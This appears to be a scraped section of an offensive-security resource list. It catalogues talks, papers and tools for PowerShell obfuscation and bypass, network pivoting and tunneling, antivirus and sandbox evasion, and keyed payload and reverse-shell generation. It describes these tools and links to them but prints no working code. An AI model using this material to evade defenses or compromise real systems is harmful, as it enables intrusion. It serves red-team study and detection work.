- It used to be that most people were just starting to hear about PowerShell. Over the last 3 years, this has changed dramatically. We now see Offensive and Defensive PowerShell tools, exploits specifically leveraging PowerShell and WMI, and more organizations are starting to be intentional for detection and monitoring of PowerShell scripts and commands. With this visibility, it is becoming a game of cat and mouse to leverage and detect PowerShell. In this talk, I will highlight some secrets I use to ensure my PowerShell exploits are successful and some unique tactics which will bypass common defensive controls. I will also walk you through the creation of a custom PowerShell C# DLL which you can use to compromise your target. If you want to code with me, be sure to bring a laptop with Visual Studio 2013 or later installed.
-
Goodbye Obfuscation, Hello Invisi Shell: Hiding Your Powershell Script in Plain Sight - Omer Yair(Derbycon2018)
- “The very concept of objective truth is fading out of the world. Lies will pass into history.” George Orwell. Objective truth is essential for security. Logs, notifications and saved data must reflect the actual events for security tools, forensic teams and IT managers to perform their job correctly. Powershell is a prime example of the constant cat and mouse game hackers and security personnel play every day to either reveal or hide the “objective truth” of a running script. Powershell’s auto logging, obfuscation techniques, AMSI and more are all participants of the same game playing by the same rules. We don’t like rules, so we broke them. As a result, Babel-Shellfish and Invisi-Shelltwo new tools that both expose and disguise powershell scripts were born. Babel-Shellfish reveals the inner hidden code of any obfuscated script while Invisi-Shell offers a new method of hiding malicious scripts, even from the Powershell process running it. Join us as we present a new way to think about scripts.
- APTs <3 PowerShell and Why You Should Too - Anthony Rose, Jake Krasnov(DefconSafeMode RTV 2020)
-
PowerShell Secrets and Tactics - Ben0xA(Derbycon2016)
-
Tools
-
HiddenPowerShellDll
- This .Net class library is used to run PowerShell scripts from c #. The bypasses are executed and then the scriptblock that invokes the stager is executed. Using the DllExport package the .Net DLL exports a function that allows it to be executed via rundll32 and this results in a bypass of the default AppLocker rules
-
HiddenPowerShellDll
-
Constrained-Language Mode
- See above.
-
Crypters
-
Xencrypt
- This tool is intended as a demo for how easy it is to write your own crypter. It works for its intended purpose and I will not patch it to make it suitable for yours.
-
Xencrypt
-
Obfuscation
-
Invoke-Obfuscation
- Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.
-
Articles/Blogposts/Writeups
- argfuscator - Obfuscating and randomizing PowerShell arguments - Jeff White(2017)
- Pulling Back the Curtains on EncodedCommand PowerShell Attacks - Jeff White(2017)
-
PowerShell Obfuscation using SecureString - @Wietze(2020)
- TL;DR - PowerShell has built-in functionality to save sensitive plaintext data to an encrypted object called
SecureString
. Malicious actors have exploited this functionality as a means to obfuscate PowerShell commands. This blog post discussesSecureString
, examples seen in the wild, and presents a tool that helps analyse SecureString obfuscated commands.
- TL;DR - PowerShell has built-in functionality to save sensitive plaintext data to an encrypted object called
- pOWershell obFUsCation - N1CFURY
-
Talks/Presentations/Videos
-
Defeating The Latest Advances in Script Obfuscation - Mark Mager(Derbycon2016)
- Defeating The Latest Advances in Script Obfuscation Mark Mager Mark Mager - @magerbomb In this age of increasingly sophisticated and devastating malware, adversaries still rely on a multitude of scripting languages and frameworks (e.g. JavaScript, VBA, PowerShell, VBScript) as key components of an attack scenario. These scripts tend to employ obfuscation techniques in order to obscure their true intent and avoid detection by endpoint protection products. Though significant advances have been made in recent years in packing and obfuscating compiled binaries, script obfuscation can still be defeated with time and a determined analyst. This talk will cover some of the most recently seen advanced obfuscation techniques employed by APTs, exploit kits, and other malware authors along with proven methods for circumventing and decoding these techniques. I will then apply these methods to guide the audience through the deobfuscation of a fully obfuscated script. Audience members will walk away with a solid understanding of how common obfuscation techniques are employed in scripting languages along with how they can be defeated.
- Invoke-CradleCrafter: Moar PowerShell obFUsk8tion by Daniel Bohannon
-
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niques') -Join'') - Daniel Bohannon(Derbycon2017)
- Attackers, administrators and many legitimate products rely on PowerShell for their core functionality. However, its power has made it increasingly attractive for attackers and commodity malware authors alike. How do you separate the good from the bad? A/V signatures applied to command line arguments work sometimes. AMSI-based (Anti-malware Scan Interface) detection performs significantly better. But obfuscation and evasion techniques like Invoke-Obfuscation can and do bypass both approaches. Revoke-Obfuscation is a framework that transforms evasion into a treacherous deceit. By applying a suite of unique statistical analysis techniques against PowerShell scripts and their structures, what was once a cloak of invisibility is now a spotlight. It works with .evtx files, command lines, scripts, ScriptBlock logs, Module logs, and is easy to extend. Approaches for evading these detection techniques will be discussed and demonstrated. Revoke-Obfuscation has been used in numerous Mandiant investigations to successfully identify obfuscated and non-obfuscated malicious PowerShell scripts and commands. It also detects all obfuscation techniques in Invoke-Obfuscation, including two new techniques being released with this presentation.
-
Defeating The Latest Advances in Script Obfuscation - Mark Mager(Derbycon2016)
-
Tools
-
PyFuscation
- Obfuscate powershell scripts by replacing Function names, Variables and Parameters.
- Invoke-CradleCrafter v1.1
- Invoke-Confusion.ps1
- PowerAvails
-
Powerob
- An on-the-fly Powershell script obfuscator meant for red team engagements. Built out of necessity.
-
Powerglot
- Powerglot encodes offensive powershell scripts using polyglots
-
PyFuscation
-
De-Obfuscate
- Revoke-Obfuscation
- Articles/Blogposts/Writeups
-
Tools
-
PowerShell: ConvertFrom-SecureString decoder
- A simple, pure JavaScript implementation decoding PowerShell's SecureString objects for analysis.
-
Babel-Shellfish
- Deobfuscate Powershell scripts right before execution. Babel-Shellfish allows to both log and scan through AMSI deobfuscated scripts. If a script is found mallicious it will stop its execution.
-
CLM-Base64
- Blogpost
- This project provides Base64 encoding and decoding functionality to PowerShell within Constrained Language Mode. Since this is constrained language mode compliant, it will also run in Full Language Mode.
-
PowerAvails
- PowerAvails Powershell .NET Operating system
-
PowerShell: ConvertFrom-SecureString decoder
-
Invoke-Obfuscation
-
Exfiltration
- Articles/Blogposts/Writeups
-
Payloads
-
Talks/Presentations/Videos
-
Malicious payloads vs. deep visibility: a PowerShell story - Daniel Bohannon(PSConEU19)
- This talk draws from over four years of Incident Response experience to lay out a technical buffet of in-the-wild malicious PowerShell payloads and techniques. In addition to diving deep into the mechanics of each malicious example, this presentation will highlight forensic artifacts, detection approaches and the deep visibility that the latest versions of PowerShell provides security practitioners to defend their organizations against the latest attacks that utilize PowerShell.
-
Malicious payloads vs. deep visibility: a PowerShell story - Daniel Bohannon(PSConEU19)
-
Generators
-
nps_payload
- This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.
-
psWar.py
- Code that quickly generates a deployable .war for a PowerShell one-liner
-
nps_payload
- **Samples
-
JSRat-Py
- implementation of JSRat.ps1 in Python so you can now run the attack server from any OS instead of being limited to a Windows OS with Powershell enabled
-
ps1-toolkit
- This is a set of PowerShell scripts that are used by many penetration testers released by multiple leading professionals. This is simply a collection of scripts that are prepared and obfuscated to reduce level of detectability and to slow down incident response from understanding the actions performed by an attacker.
-
JSRat-Py
-
Signatures
- DigitalSignature-Hijack.ps1
-
PoCSubjectInterfacePackage
- A proof-of-concept subject interface package (SIP) used to demonstrate digital signature subversion attacks.
-
Talks/Presentations/Videos
-
Miscellaneous Useful Things
-
Invoke-VNC
- Powershell VNC injector
-
Invoke-BSOD
- A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. Also enumerates Windows crash dump settings. This is a standalone script, it does not depend on any other files.
-
Invoke-SocksProxy
- Creates a Socks proxy using powershell.
-
PowerShell-Suite
- There are great tools and resources online to accomplish most any task in PowerShell, sometimes however, there is a need to script together a util for a specific purpose or to bridge an ontological gap. This is a collection of PowerShell utilities I put together either for fun or because I had a narrow application in mind. - b33f
-
Powershell-SSHTools
- A bunch of useful SSH tools for powershell
-
random-powershell
- Various PowerShell scripts that have come in handy but aren't important enough for their own repository
-
Invoke-VNC
-
Utilities
-
7Zip4Powershell
- Powershell module for creating and extracting 7-Zip archives
-
7Zip4Powershell
-
Servers
- Dirty Powershell Webserver
-
Pode
- Pode is a PowerShell framework that runs HTTP/TCP listeners on a specific port, allowing you to host REST APIs, Web Pages and SMTP/TCP servers via PowerShell. It also allows you to render dynamic HTML using PSHTML files.
-
PowerHub
- Webserver frontend for powersploit with functionality and niceness.
-
Harness
- Harness is remote access payload with the ability to provide a remote interactive PowerShell interface from a Windows system to virtually any TCP socket. The primary goal of the Harness Project is to provide a remote interface with the same capabilities and overall feel of the native PowerShell executable bundled with the Windows OS.
Pivoting & Tunneling
-
Pivoting
-
Articles/Writeups
- A Red Teamer's guide to pivoting
- Pivoting into a network using PLINK and FPipe
- Pillage the Village Redux w/ Ed Skoudis & John Strand - SANS
- Browser Pivot for Chrome - cplsec
- Browser Pivoting (Get past two-factor auth) - blog.cobalstrike
-
Windows Domains, Pivot & Profit - Fuzzynop
- Hola! In this write-up we will be looking at different ways to move laterally when compromising a Windows domain. This post is by no means exhaustive but it should cover some of the more basic techniques and thought processes.
- Bash
- Metasploit
-
SSH
- Pivoting Ssh Reverse Tunnel Gateway
- SSH Gymnastics and Tunneling with ProxyChains
- SSH Cheat Sheet - pentestmonkey
-
proxychains-ng
- proxychains ng (new generation) - a preloader which hooks calls to sockets in dynamically linked programs and redirects it through one or more socks/http proxies. continuation of the unmaintained proxychains project. the sf.net page is currently not updated, use releases from github release page instead.
- Using sshuttle in daily work - Huiming Teo
- Proxyjump, the SSH option you probably never heard of - Khris Tolbert(2020)
- VPN
- WMIC
-
Tools
-
Socat
- socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
- Examples of use
- Socat Cheatsheet
-
XFLTReaT
- XFLTReaT tunnelling framework
-
Discovery
-
nextnet
- nextnet is a pivot point discovery tool written in Go.
-
nextnet
- DNS
-
HTTP/HTTPS
-
SharpSocks
- Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell
-
Chisel
- Chisel is a fast TCP tunnel, transported over HTTP, secured via SSH. Single executable including both client and server. Written in Go (golang). Chisel is mainly useful for passing through firewalls, though it can also be used to provide a secure endpoint into your network.
-
SharpChisel
- C# Wrapper of Chisel from https://github.com/jpillora/chisel
-
Crowbar
- Crowbar is an EXPERIMENTAL tool that allows you to establish a secure circuit with your existing encrypting TCP endpoints (an OpenVPN setup, an SSH server for forwarding...) when your network connection is limited by a Web proxy that only allows basic port 80 HTTP connectivity. Crowbar will tunnel TCP connections over an HTTP session using only GET and POST requests. This is in contrast to most tunneling systems that reuse the CONNECT verb. It also provides basic authentication to make sure nobody who stumbles upon the server steals your proxy to order drugs from Silkroad.
-
A Black Path Toward The Sun(ABPTTS)
- ABPTTS uses a Python client script and a web application server page/package[1] to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server. In other words, anywhere that one could deploy a web shell, one should now be able to establish a full TCP tunnel. This permits making RDP, interactive SSH, Meterpreter, and other connections through the web application server.
-
pivotnacci
- Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server which communicates with HTTP agents
-
graftcp
- graftcp can redirect the TCP connection made by the given program [application, script, shell, etc.] to SOCKS5 or HTTP proxy.
-
Tunna
- Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
-
SharpSocks
-
HTTP2
-
gTunnel
- A TCP tunneling suite built with golang and gRPC. gTunnel can manage multiple forward and reverse tunnels that are all carried over a single TCP/HTTP2 connection. I wanted to learn a new language, so I picked go and gRPC. Client executables have been tested on windows and linux.
-
gTunnel
-
ICMP
-
Hans - IP over ICMP - hans
- Source
- Hans makes it possible to tunnel IPv4 through ICMP echo packets, so you could call it a ping tunnel. This can be useful when you find yourself in the situation that your Internet access is firewalled, but pings are allowed.
-
icmptx
- ICMPTX is a program that allows a user with root privledges to create a virtual network link between two computers, encapsulating data inside of ICMP packets.
-
Hans - IP over ICMP - hans
- PowerShell
-
RDP
-
Socks Over RDP / Socks Over Citrix
- This tool adds the capability of a SOCKS proxy to Terminal Services (or Remote Desktop Services) and Citrix (XenApp/XenDesktop). It uses Dynamic Virtual Channel that enables us to communicate over an open RDP/Citrix connection without the need to open a new socket, connection or a port on a firewall.
- Socks Over RDP - Balazs Bucsay(2020)
-
Socks Over RDP / Socks Over Citrix
-
SMB
-
Piper
- Creates a local or remote port forwarding through named pipes.
-
flatpipes
- A TCP proxy over named pipes. Originally created for maintaining a meterpreter session over 445 for less network alarms.
-
Invoke-PipeShell
- This script demonstrates a remote command shell running over an SMB Named Pipe. The shell is interactive PowerShell or single PowerShell commands
-
Invoke-Piper
- Forward local or remote tcp ports through SMB pipes.
-
Piper
-
SSH
-
SSHDog
- SSHDog is your go-anywhere lightweight SSH server. Written in Go, it aims to be a portable SSH server that you can drop on a system and use for remote access without any additional configuration.
-
MeterSSH
- MeterSSH is a way to take shellcode, inject it into memory then tunnel whatever port you want to over SSH to mask any type of communications as a normal SSH connection. The way it works is by injecting shellcode into memory, then wrapping a port spawned (meterpeter in this case) by the shellcode over SSH back to the attackers machine. Then connecting with meterpreter's listener to localhost will communicate through the SSH proxy, to the victim through the SSH tunnel. All communications are relayed through the SSH tunnel and not through the network.
-
powermole
- This program will let you perform port forwarding, redirect internet traffic, and transfer files to, and issue commands on, a host without making a direct connection (ie. via one or more intermediate hosts), which would undoubtedly compromise your privacy. This solution can only work when you or your peers own one or more hosts as this program communicates with SSH servers. This program can be viewed as a multi-versatile wrapper around SSH with the ProxyJump directive enabled. Powermole creates automatically a ssh/scp configuration file to enable key-based authentication with the intermediate hosts.
-
SSHDog
-
SOCKS/TCP/UDP
- RFC1928: SOCKS Protocol Version 5
- SOCKS: A protocol for TCP proxy across firewalls
-
shootback
- shootback is a reverse TCP tunnel let you access target behind NAT or firewall
-
ssf - Secure Socket Funneling
- Network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer. SSF is cross platform (Windows, Linux, OSX) and comes as standalone executables.
-
PowerCat
- A PowerShell TCP/IP swiss army knife that works with Netcat & Ncat
-
Udp2raw-tunnel
- A Tunnel which tunnels UDP via FakeTCP/UDP/ICMP Traffic by using Raw Socket, helps you Bypass UDP FireWalls(or Unstable UDP Environment). Its Encrypted, Anti-Replay and Multiplexed. It also acts as a Connection Stabilizer.)
-
reGeorg
- The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.
-
redsocks – transparent TCP-to-proxy redirector
- This tool allows you to redirect any TCP connection to SOCKS or HTTPS proxy using your firewall, so redirection may be system-wide or network-wide.
-
ligolo
- Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve). It is comparable to Meterpreter with Autoroute + Socks4a, but more stable and faster.
-
proxychains-windows
- Windows and Cygwin port of proxychains, based on MinHook and DLL Injection
-
rpivot
- This tool is Python 2.6-2.7 compatible and has no dependencies beyond the standard library. It has client-server architecture. Just run the client on the machine you want to tunnel the traffic through. Server should be started on pentester's machine and listen to incoming connections from the client.
-
Secure Socket Funneling
- Secure Socket Funneling (SSF) is a network tool and toolkit. It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS tunnel to a remote computer. SSF is cross platform (Windows, Linux, OSX) and comes as standalone executables.
-
WMI
-
PowerLurk
- PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement.
- Creeping on Users with WMI Events: Introducing PowerLurk
-
PowerLurk
-
VNC
-
Invoke-Vnc
- Invoke-Vnc executes a VNC agent in-memory and initiates a reverse connection, or binds to a specified port. Password authentication is supported.
-
jsmpeg-vnc
- A low latency, high framerate screen sharing server for Windows and client for browsers
-
Invoke-Vnc
-
Socat
-
Articles/Writeups
Avoiding/Bypassing AV(Anti-Virus)/UAC/Whitelisting/Sandboxes/Logging/etc - General Evasion Tactics & Techniques
-
101
-
Educational
-
Learn how to hide your trojans, backdoors, etc from anti virus.
-
Easy Ways To Bypass Anti-Virus Systems - Attila Marosi -Trooper14
-
Muts Bypassing AV in Vista/Pissing all over your AV
- presentation, listed here as it was a bitch finding a live copy
-
How to Bypass Anti-Virus to Run Mimikatz - Spoiler, AV still suck, changing strings is helpful
-
- The goal of this repo is to study the Windows penetration techniques.
-
Art of Anti Detection 1 – Introduction to AV & Detection Techniques - Ege Balci
-
Art of Anti Detection 2 – PE Backdoor Manufacturing - Ege Balci
-
Breaking Antivirus Software - Joxean Koret, COSEINC(SYSCAN2014)
-
- While security products are a great supplement to the defensive posture of an enterprise, to well-funded nation-state actors, they are an impediment to achieving their objectives. As pentesters argue the efficacy of a product because it doesn't detect their specific offensive technique, mature actors recognize a need to holistically subvert the product at every step during the course their operation.
- Whitepaper
- Slides
- Code
-
Articles/Blogposts/Writeups
- Unsorted:
- Learn how to hide your trojans, backdoors, etc from anti virus.
- [Virus] Self-modifying code-short overview for beginners(2010)
- AVLeak: Fingerprinting Antivirus Emulators Through Black-Box Testing - Jeremy Blackthorne, Alexei Bulazel, Andrew Fasano, Patrick Biernat, Bülent Yener(USENIX WOOT2016)
-
Facts and myths about antivirus evasion with Metasploit - mihi - 2011
- This article tries to given an overview about the current executable generation scheme of Metasploit, how AV detects them, and how to evade them. Note that this document only covers standalone EXE files (for Windows) that replace an EXE template's functionality, and not other payloads for exploits, service executables (like for the windows/psexec exploit) or executables that merely add to the original template's functionality (like the -k option of msfpayload).
- Easy Ways To Bypass Anti-Virus Systems - Attila Marosi(DeepSec 2013)
- Custom Meterpreter loader DLL - Asr0baby(2014)
- Three Simple Disguises for Evading Antivirus - Logan Lembke(2016)
- Meterpreter stage AV/IDS evasion with powershell - arno0x0x(2016)
- Escaping The Avast Sandbox Using A Single IOCTL - Kyriakos Economou(2016)
- How to Bypass Anti-Virus to Run Mimikatz - Carrie Roberts(2017)
- How to Accidently Win Against AV - RastaMouse(2017)
- Executing Meterpreter in Memory on Windows 10 and Bypassing AntiVirus - n00py(2018)
- Antivirus Evasion for Penetration Testing Engagements - Nathu Nandwani(2018)
- Bypassing Detection for a Reverse Meterpreter Shell - Mohit Suyal(2018)
- Simple AV Evasion Symantec and P4wnP1 USB - Frans Hendrik Botes(2019)
- Distribution of malicious JAR appended to MSI files signed by third parties - Bernardo.Quintero(2019)
- On code isolation in Python - Artem Golubin(2020)
- Unsorted:
-
Talks & Presentations
-
Adventures in Asymmetric Warfare - Will Schroeder(BSides Augusta2014)
- As a co-founder and principal developer of the Veil-Framework, the speaker has spent a considerable amount of time over the past year and a half researching AV-evasion techniques. This talk will briefly cover the problem space of antivirus detection, as well as the reaction to the initial release of Veil-Evasion, a tool for generating AV-evading executables that implements much of the speaker’s research. We will trace through the evolution of the obfuscation techniques utilized by Veil-Evasion’s generation methods, culminating in the release of an entirely new payload language class, as well as the release of a new ..NET encryptor. The talk will conclude with some basic static analysis of several Veil-Evasion payload families, showing once and for all that antivirus static signature detection is dead.
-
Adventures in Asymmetric Warfare - Will Schroeder(BSides Augusta2014)
-
-
101
-
Sandboxes from a pen tester’s view - Rahul Kashyap
- Description: In this talk we’ll do an architectural decomposition of application sandboxing technology from a security perspective. We look at various popular sandboxes such as Google Chrome, Adobe ReaderX, Sandboxie amongst others and discuss the limitations of each technology and it’s implementation. Further, we discuss in depth with live exploits how to break out of each category of sandbox by leveraging various kernel and user mode exploits – something that future malware could leverage. Some of these exploit vectors have not been discussed widely and awareness is important.
-
Sandboxes from a pen tester’s view - Rahul Kashyap
- Adobe Sandbox
- chroot
- Breaking out of Contained Linux Shells
-
Python Sandbox
- Escaping a Python sandbox with a memory corruption bug
- Breaking out of secured Python environments
- Sandboxed Execution Environment
-
Documentation
- Sandboxed Execution Environment (SEE) is a framework for building test automation in secured Environments. The Sandboxes, provided via libvirt, are customizable allowing high degree of flexibility. Different type of Hypervisors (Qemu, VirtualBox, LXC) can be employed to run the Test Environments.
- Usermode Sandboxing
- ssh
-
Windows
- Windows Desktop Breakout
- Kiosk/POS Breakout Keys in Windows - TrustedSec
- menu2eng.txt - How To Break Out of Restricted Shells and Menus, v2.3(1999)
-
Kiosk Escapes Pt 2 - Ft. Microsoft Edge!! - H4cklife
- TL/DR: Microsoft Edge brings up Windows Explorer when you navigate to C:\ in the URL; Win+x can be used to access the start menu when shortcut keys are limited
- An excellent whitepaper detailing methods for breaking out of virtually any kind of restricted shell or menu you might come across.
- Breaking Typical Windows Hardening Implementations - Oddvar Moe(2020)
- VDI
-
VirtualMachine
- Exploiting the Hyper-V IDE Emulator to Escape the Virtual Machine - Joe Bialek
-
L1TF (Foreshadow) VM guest to host memory read PoC
- This is a PoC for CVE-2018-3646. This is a vulnerability that enables malicious/compromised VM guests to read host machine physical memory. The vulnerability is exploitable on most Intel CPUs that support VT-x and EPT (extended page tables). This includes all Intel Core iX CPUs. This PoC works only on 64 bit x86-64 systems (host and guest).
-
101
Payloads & Shells
- 101
-
Payloads
- Staged vs Stageless Handlers - OJ Reeves
- Toying with inheritance - hexacorn
-
Proxy-Aware Payload Testing - redxorblue
- "I get told that I am too wordy, so if you want the summary, here are some steps to setup a virtual testing environment to test payloads to see if they can handle HTTP(S) proxies and if so, can they authenticate properly through them as well. This post will cover the proxy setup without authentication since that is the easier part, and I will do a second post shortly to hack together the authentication portion of it."
-
Handling Shells
-
Alveare
- Multi-client, multi-threaded reverse shell handler written in Node.js. Alveare (hive in italian) lets you listen for incoming reverse connection, list them, handle and bind the sockets. It's an easy to use tool, useful to handle reverse shells and remote processes.
-
Alveare
-
Tools to help generate payloads
-
- A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).
-
- Magic Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
-
- SharpShooter is a payload creation framework for the retrieval and execution of arbitrary CSharp source code. SharpShooter is capable of creating payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object. Payloads can be retrieved using Web or DNS delivery or both; SharpShooter is compatible with the MDSec ActiveBreach PowerDNS project. Alternatively, stageless payloads with embedded shellcode execution can also be generated for the same scripting formats.
-
- Gscript is a framework for building multi-tenant executors for several implants in a stager. The engine works by embedding runtime logic (powered by the V8 Javascript Virtual Machine) for each persistence technique. This logic gets run at deploy time on the victim machine, in parallel for every implant contained with the stager. The Gscript engine leverages the multi-platform support of Golang to produce final stage one binaries for Windows, Mac, and Linux.
-
Techniques
- Crypters
-
Keying
- Articles
-
Talks/Presentations/Videos
-
Context-Keyed Payload Encoding: Fighting The Next Generation of IDS - Dimitris Glynos(AthCon2010)
- Slides
- Paper
- Exploit payload encoding allows hiding maliciouspayloads from modern Intrusion Detection Systems (IDS). Although metamorphic and polymorphic encoding allow such payloads to be hidden from signature-based and anomaly-based IDS,these techniques fall short when the payload is being examined by IDS that can trace the execution of malicious code. Context-keyed encodingis a technique that allows the attacker to encrypt the malicious payload in such a way, that it canonly be executed in an environment (context) withspecific characteristics. By selecting an environment characteristic that will not be present during the IDS trace (but will be present on the target host), the attacker may evade detection by advanced IDS. This paper focuses on the current research in context-keyed payload encoding and proposes a novel encoder that surpasses many of the limitations found in its predecessors.
-
Advanced Payload Strategies: “What is new, what works and what is hoax?”
- This talk focuses on the shellcode perspective and it’s evolution. From the simplest {shell}code to the polymorphism to bypass filters and I{D|P}S (which has lots of new ideas, like application-specific decoders, decoders based on architecture-instructions, and many others), passing through syscall proxying and injection, this talk will explain how it works and how effective they are against the new evolving technologies like network code emulation, with live demonstrations. There is long time since the first paper was released about shellcoding. Most of modern text just tries to explain the assembly structure and many new ideas have just been released as code, never been detailed or explained. The talk will try to fix this gap, also showing some new ideas and considering different architectures.
- Genetic Malware: Designing Payloads for Specific Targets - Travis Morrow, Josh Pitts(2016)
-
Protect Your Payloads Modern Keying Techniques - Leo Loobeek(Derybcon2018)
- Our payloads are at risk! Incident responders, threat hunters, and automated software solutions are eager to pick apart your new custom dropper and send you back to square one. One answer to this problem is encrypting your payload with key derivation functions ("keying") which leverages a variety of local and remote resources to build the decryption key. Throughout this talk I will present modern keying techniques and demo some tools to help along the way. I will start with showing how easy it is to discover attacker infrastructure or techniques in the payloads we commonly use every day. I will then quickly review how keying helps and the considerations when generating keyed payloads. Throughout the presentation many practical examples of keying techniques will be provided which can be used for typical pentests or full red team operations. Finally I will introduce KeyServer, a new piece to add to your red team infrastructure which handles advanced HTTP and DNS keying. Using unprotected payloads during ops should be a thing of the past. Let’s regain control of our malicious code and make it harder on defenders! This talk is based on the original research of environmental keying by Josh Pitts and Travis Morrow.
-
Context-Keyed Payload Encoding: Fighting The Next Generation of IDS - Dimitris Glynos(AthCon2010)
-
Papers
-
Environmental Key Generation towards Clueless Agents - J. Riordan and B. Schneier(1998)
- In this paper, we introduce a collection of cryptographic key constructions built from environmental data that are resistant to adversarial analysis and deceit. We expound upon their properties and discuss some possible applications; the primary envisioned use of these constructions is in the creation of mobile agents whose analysis does not reveal their exact purpose.
-
Strong Cryptography Armoured Computer VirusesForbidding Code Analysis: the bradley virusEric Filiol(2004)
- Imagining what the nature of future viral attacks might look like is the key to successfully protecting against them. This paper discusses how cryptography and key management techniques may definitively checkmate antiviral analysis and mechanisms. We present a generic virus, denoted bradley which protects its code with a very secure, ultra-fast symmetric encryption. Since the main drawback of using encryption in that case lies on the existence of the secret key or information about it within the viral code, we show how to bypass this limitation by using suitable key management techniques. Finally, we show that the complexity of the bradley code analysis is at least as high as that of the cryptanalysis of its underlying encryption algorithm.
-
Foundations and applications for secure triggers - Ariel Futoransky, Emiliano Kargieman, Carlos Sarraute, Ariel Waissbein(2006)
- Imagine there is certain content we want to maintain private until some particular event occurs, when we want to have it automatically disclosed. Suppose, furthermore, that we want this done in a (possibly) malicious host. Say the confidential content is a piece of code belonging to a computer program that should remain ciphered and then “be triggered” (i.e., deciphered and executed) when the underlying system satisfies a preselected condition, which must remain secret after code inspection. In this work we present different solutions for problems of this sort, using different “declassification” criteria, based on a primitive we call secure triggers. We establish the notion of secure triggers in the universally composable security framework of Canetti [2001] and introduce several examples. Our examples demonstrate that a new sort of obfuscation is possible. Finally, we motivate its use with applications in realistic scenarios.
- Context-keyed Payload Encoding: Preventing Payload Disclosure via Context - druid@caughq.org(2008)
- Malicious cryptography. . . reloaded - Eric Filiol, Fr'ed'eric Raynal(CanSecWest2008)
- Context-keyed Payload Encoding:Fighting the Next Generation of IDS - Dimitrios A. Glynos(2010)
-
Impeding Automated Malware Analysis with Environment-sensitive Malware - Chengyu Song, Paul Royal, Wenke Lee(2012)
- To solve the scalability problem introduced by the exponential growth of malware, numerous automated malware analysis techniques have been developed. Unfortunately, all of these approaches make previously unaddressed assumptions that manifest as weaknesses to the tenability of the automated malware analysis process. To highlight this concern, we developed two obfuscation techniques that make the successful execution of a malware sample dependent on the unique properties of the original host it infects. To reinforce the potential for malware authors to leverage this type of analysis resistance, we discuss the Flashback botnet’s use of a similar technique to prevent the automated analysis of its samples.
-
Sleeping Your Way out of theSandbox - Hassan Mourad(2015)
- In recent years,the security landscape has witnessed the rise of a new breed of malware, Advanced Persistence Threat, or APT for short. With all traditional security solutions failing to address this new threat, a demand was created for new solutions that are capable of addressing the advanced capabilities of APT. One of the offeredsolutions was file-based sandboxes,asolution that dynamically analyzes files and judgestheir threat levelsbased on their behavior in an emulated/virtual environment. But security is a cat and mouse game, and malware authors are always trying to detect/bypass such measures. Some of the common techniques used by malware for sandbox evasionwill be discussed in this paper. This paperwill also analyze how to turn somecountermeasuresused by sandboxes against it. Finally, itwill introduce some new ideas for sandbox evasion along with recommendationsto address them.
- Hot Knives Through Butter: Evading File-based Sandboxes - Abhishek Singh, Zheng Bu(2014)
-
Environmental Key Generation towards Clueless Agents - J. Riordan and B. Schneier(1998)
-
Tools
-
Metasploit
-
Hostname-based Context Keyed Payload Encoder - Metasploit Module
- 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.'
-
Hostname-based Context Keyed Payload Encoder - Metasploit Module
-
EBOWLA
- Framework for Making Environmental Keyed Payloads
-
keyring
- KeyRing was written to make key derivation functions (keying) more approachable and easier to quickly develop during pentesting and red team operations. Keying is the idea of encrypting your original payload with local and remote resources, so it will only decrypt on the target system or under other situations.
-
satellite
- Satellite: A Payload and Proxy Service for Red Team Operations - Max Harley
- Satellite is an web payload hosting service which filters requests to ensure the correct target is getting a payload. This can also be a useful service for hosting files that should be only accessed in very specific circumstances.
-
GoGreen
- This project was created to bring environmental (and HTTP) keying to scripting languages. As its common place to use PowerShell/JScript/VBScript as an initial vector of code execution, as a result of phishing or lateral movement, I see value of the techniques for these languages.
-
Spotter
- Spotter is a tool to wrap payloads in environmentally-keyed, AES256-encrypted launchers. These keyed launchers provide a way to ensure your payload is running on its intended target, as well as provide a level of protection for the launcher itself.
-
Metasploit
- Polyglot
-
(Ex)/(S)ample Payloads and supporting tools written in various languages
-
C & C++
-
Undetectable C# & C++ Reverse Shells - Bank Security
- Technical overview of different ways to spawn a reverse shell on a victim machine
-
Undetectable C# & C++ Reverse Shells - Bank Security
-
C#
-
EasyNet
- Packs/unpacks arbitrary data using a simple Data -> Gzip -> AES -> Base64 algorithm. Generates a random AES-256 key and and IV and provides them to the user. Can be used to pack or unpack arbitrary data. Provided both as a program and a library.
-
Inception Framework
- Inception provides In-memory compilation and reflective loading of C# apps for AV evasion. Payloads are AES encrypted before transmission and are decrypted in memory. The payload server ensures that payloads can only be fetched a pre-determined number of times. Once decrypted, Roslyn is used to build the C# payload in memory, which is then executed using reflection.
-
EasyNet
-
Go
-
Go-deliver
- Go-deliver is a payload delivery tool coded in Go. This is the first version and other features will be added in the future.
-
Hershell
